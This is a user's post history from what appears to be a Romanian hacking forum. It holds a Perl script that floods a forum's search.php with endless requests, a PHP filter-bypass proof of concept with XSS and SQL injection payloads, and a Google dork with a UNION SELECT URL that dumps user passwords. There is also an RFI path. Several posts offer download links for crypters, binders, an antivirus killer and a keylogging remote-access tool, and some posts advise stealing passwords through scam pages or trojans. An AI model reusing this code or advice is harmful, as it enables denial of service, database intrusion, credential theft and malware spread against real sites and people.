Jump to content

Ras

Active Members
  • Posts

    1106
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by Ras

  1. #!"c:\perl\bin\perl.exe" use Socket; if (@ARGV < 2) { &usage; } $rand=rand(10); $host = $ARGV[0]; $dir = $ARGV[1]; $host =~ s/(http:\/\/)//eg; for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999; $i++) { $user="h4x0r".$rand.$i; $data = "s=&do=process&query=$user&titleonly=0&starteronly=0&exactname=1&replyless=0&replylimit=3&searchdate=1&beforeafter=before&sortby=title&order=descending&showposts=1&forumchoice[]=0&childforums=1&dosearch=Search%20Now"; $len = length $data; $foo = "POST ".$dir."search.php HTTP/1.1\r\n". "Accept: */*\r\n". "Accept-Language: en-gb\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Accept-Encoding: gzip, deflate\r\n". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n". "Host: $host\r\n". "Content-Length: $len\r\n". "Connection: Keep-Alive\r\n". "Cache-Control: no-cache\r\n\r\n". "$data"; my $port = "80"; my $proto = getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto); connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo; send(SOCKET,"$foo", 0); syswrite STDOUT, "|" ; } print "\n\n"; system('ping $host'); sub usage { print "\tusage: \n"; print "\t$0 <host> </dir/>\n"; print "\tex: $0 127.0.0.1 /forum/\n"; print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n\n"; print "\th4x0r Security Team\n"; print "\twww.h4x0r.ir\n\n"; exit(); };
  2. dupa click here scrie immonitor . com << sunt niste spatii inainte de . si dupa . si d'asta nu merge iar link-ul bun este http://immonitor.com/
  3. <?php //////////////////////////////////////////////////////////////////////// // _ _ _ _ ___ _ _ ___ // // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ // // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ // // |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| // // // // Proof of concept code from the Hardened-PHP Project // // (C) Copyright 2007 Stefan Esser // // // //////////////////////////////////////////////////////////////////////// // PHP ext/filtet FDF POST Filter Bybass Exploit // //////////////////////////////////////////////////////////////////////// // This is meant as a protection against remote file inclusion. die("REMOVE THIS LINE"); // _POST is the array that will be sent to the url in $url $_POST = array(); $_POST['var1'] = "<script>alert(/XSS/);</script>"; $_POST['var2'] = " ' UNION SELECT "; $url = "http://127.0.0.1/info.php"; // You do not need to change anything below this $outfdf = fdf_create(); foreach ($_POST as $key => $value) { fdf_set_value($outfdf, $key, $value, 0); } fdf_save($outfdf, "outtest.fdf"); fdf_close($outfdf); $ret = file_get_contents("outtest.fdf "); unlink("outtest.fdf"); $params = array('http' => array( 'method' => 'POST', 'content' => $ret, 'header' => 'Content-Type: application/vnd.fdf' )); $ctx = stream_context_create($params) ; $fp = @fopen($url, 'rb', false, $ctx); if (!$fp) { die("Cannot open $url"); } $response = @stream_get_contents($fp); echo $response; echo "\n"; ?> //
  4. Download: http://rapidshare.com/files/41046993/Enigma.rar
  5. Sa ii afli parola nu cred ca exista dar ... poti intra pe mailul cuiva cu acele cookies ... da De ce zici ca nu poti sa ii afli parola? Poti sa folosesti o pagina scam sau un trojan sau un keylogger...
  6. Ras

    Slh 4.0.3

    What's new since the 4.0.2? client now more stable speeded up transfer manager added password retrieval changed keylogger updates as soon as keys are pressed fixed offline keylogger problem Download: http://rapidshare.com/files/41034903/Slh_4.0.3.rar
  7. Pestil v1.0 _____________________ Basically drag and drop your file or you can use 'Select File' button.Choose your settings and protect the file. Settings _________ - Preserve EOF Data : Pestil will automatically dedect if there is any data end of the file.And this option will be automatically checked.If you don't want to preserve EOF data uncheck this option. - Strip Reloc : If you check this option,Pestil will remove reloc section from the file,it can make your applications smaller. - Encrypt Stub : This will remove some tags from packed file,i don't suggest using it - Don't pack file : If you select this option,you file won't be compressed,it will be crypted also. - Version Info : You can preserve version info and you can use other program's version info with pestil. - Icon Settings : You can change application icon before protecting your file. [+]IF GET ANY ERRORS WHILE PROTECTING,SELECT "SAFE MODE" IN AGREEMENT PAGE Download: http://rapidshare.com/files/40997706/Pestil.rar
  8. Ras

    yahoo

    la mine ma loga pe messenger si stateam vreo 5-10 secunde si dupaia ma deloga.
  9. Merge perfect! Download: http://rapidshare.com/files/40967733/Simple_Crypter_v1.0.rar
  10. Cu ajutorul acestui program puteti face un fisier .exe sa inchida Kaspersky... bineinteles ca victima trebuie sa ruleze fisierul creeat de voi. Download: http://rapidshare.com/files/40967100/Anti_Kaspersky_v1.1.rar
  11. Click dreapta sub "File Name" pentru a adauga fisierele care doriti sa le bindati. Download: http://rapidshare.com/files/40965294/Themis_Binder_v0.2.rar
  12. Merci!
  13. Inca nu am testat... Download: http://rapidshare.com/files/40842303/G_X_s_Protector_v1.2.rar
  14. As vrea si eu un avatar daca se poate... sa fie ceva cu Ras... in rest pui tu ce vrei dupa ce termini site-ul sa ne dai si noua adresa ...
  15. e veche rau melodia dar e tare.
  16. ma bag eu
  17. tot caterinca la romani )) http://www.youtube.com/watch?v=aY89PuAOWhw&mode=related&search=
  18. Found by E.Minaev (underwater@itdefence.ru) ITDefence.ru 1) SQL Injection in login function. With help of this injection is possible to make per-symbol brute of tables names of blog's database (magic_quotes_gpc should be tured off). ------------------------------------------ "$sql = "select * from $tblUsers where login = '$login'"; if ( $login != $row['login'] ) $valid_user = 0; if ( $password != $row['password'] ) $valid_user = 0;" ------------------------------------------ 2) Remote File Inclusion (RFI) /includes/sessions.php?wb_class_dir=shell?
  19. Download: http://rapidshare.com/files/40573692/Themida_v1.9.1.0.rar
  20. Download: http://rapidshare.com/files/40567204/MorphBeta.rar
  21. Uita-te la Programe H4ck si gasesti acolo si trojeni si keyloggere. Foloseste si tu "Cautare" este sus de tot langa "Pagina Principala"
  22. puteai sa cauti si tu pe forum... poti folosi un keylogger, un trojan, o pagina scam.
  23. Ras

    Problema 2

    cred ca trebuie sa spunem de ce 5+5+5 = 550
  24. pune-l si tu aici
  25. Site : [url]www.avscripts.net[/url] Dork : "Powered By AV Arcade" Exploit: http://site.com/index.php?cat_id=NumOfCatgorey/**/union/**/select/**/1,concat(char(32,%2032,%2032,%2032,%2032,%2032,%2032,%2032,32,32,32,32,32),username,char(58,58,58),password)/**/from/**/ava_users/**/where%20id=Uid Example: [url]http://www.gotovski.cool-bg.co.uk[/url] Admin Panel : site.com/admin/ Found By : WaReZ
×
×
  • Create New...